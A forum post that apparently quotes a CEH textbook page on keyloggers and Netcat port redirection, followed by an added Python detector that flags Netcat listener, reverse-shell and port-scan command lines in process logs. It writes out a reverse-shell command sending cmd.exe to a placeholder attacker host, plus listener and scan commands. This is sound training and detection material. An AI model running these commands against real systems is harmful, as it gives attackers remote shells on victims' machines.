CEH

(Jeff_L) #1

204 Chapter 8 ■ Trojans, Viruses, Worms, and Covert Channels


Some of the keystroke recorders include these:
■ IKS Software Keylogger—A Windows-based keylogger that runs in the background on
a system at a very low level. Due to the way this software is designed and runs, it is very
hard to detect using most conventional means. The program is designed to run at such a
low level that it does not show up in process lists or through normal detection methods.
■ Ghost Keylogger—Another Windows-based keylogger that is designed to run silently in
the background on a system, much like IKS. The difference between this software and
IKS is that it can record activity to an encrypted log that can be e-mailed to the attacker.
■ Spector Pro—Designed to capture keystroke activity, e-mail passwords, chat
conversations and logs, and instant messages.
■ Fakegina—An advanced keylogger that is very specific in its choice of targets. This
software component is designed to capture usernames and passwords from a Windows
system. Specifically, it intercepts the communication between the Winlogon process
and the logon GUI in Windows.

Netcat is a simple command-line utility available for Linux, Unix, and Windows
platforms. It is designed to read information from connections using TCP or UDP and do
simple port redirection on them as configured.
Let’s look at the steps involved to use Netcat to perform port redirection. The first step
is for the hacker to set up what is known as a listener on their system. This prepares the
attacker’s system to receive the information from the victim’s system. To set up a listener,
the command is as follows:

nc -n -v -l -p 80

After this, the attacker needs to execute the following command on the victim’s system
to redirect the traffic to their system:

nc -n hackers_ip 80 -e "cmd.exe"

Once this is entered, the net effect is that the command shell on the victim’s system is at
the attacker’s command prompt, ready for input as desired.

Of course, Netcat has some other capabilities, including port scanning and placing files
on a victim’s system. Port scanning can be accomplished using the following command:

nc -v -z -w1 IPaddress <start port>-<ending port>

This command scans a range of ports as specified.
Netcat isn’t the only tool available to do port redirection. Tools such as Datapipe and
Fpipe can perform the same functions, albeit in different ways.
The following is a list of options available for Netcat:
■ nc -d—Detaches Netcat from the console
■ nc -l -p [port]—Creates a simple listening TCP port; adding -u places it into UDP
mode
■ nc -e [program]—Redirects stdin/stdout from a program
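
Seen from the defender's side, the listener, program-redirect and port-scan usages above are recognizable in process command-line logs. The following is an added example, not from the book or the original post: it classifies command lines using the flag meanings from the option list above. The function names, finding labels and sample command lines are constructed for illustration.

```python
import shlex

NC_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe"}
# Flag meanings as given in the page's option list and commands.
FLAG_MEANING = {"l": "listener", "e": "program-redirect", "z": "port-scan",
                "d": "detached-from-console", "u": "udp"}
TAKES_VALUE = {"p", "e", "w"}  # the next token (or rest of this one) is a value

def classify_netcat(cmdline):
    """Return sorted findings for one command line; [] if it is not Netcat."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                              # unbalanced quotes
        tokens = cmdline.split()
    if not tokens:
        return []
    exe = tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in NC_NAMES:
        return []
    findings, i = set(), 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for pos, ch in enumerate(letters):      # handles clusters like -nvlp
                if ch in FLAG_MEANING:
                    findings.add(FLAG_MEANING[ch])
                if ch in TAKES_VALUE:
                    if pos == len(letters) - 1:     # value is the next token
                        i += 1
                    break                           # rest of token is the value
        i += 1
    if "program-redirect" in findings:
        findings.add("exec-on-listener" if "listener" in findings
                     else "exec-over-outbound-connection")
    return sorted(findings)

# Constructed process command lines (not captured from a real host).
SAMPLE_CMDLINES = [
    'nc -n -v -l -p 80',
    'nc -n 203.0.113.7 80 -e "cmd.exe"',
    'nc -v -z -w1 192.0.2.10 20-25',
    r'"C:\Users\Public\nc.exe" -d -nvlp 4444 -e cmd.exe',
    'notepad.exe -l report.txt',
]

def triage(cmdlines):
    """Map each flagged Netcat command line to its findings."""
    return {c: f for c in cmdlines if (f := classify_netcat(c))}

if __name__ == "__main__":
    for cmd, found in triage(SAMPLE_CMDLINES).items():
        print(found, "<-", cmd)
```

The check matches on the binary's file name, so a renamed copy of Netcat is not caught by it; other Netcat variants may also assign different meanings to these flags.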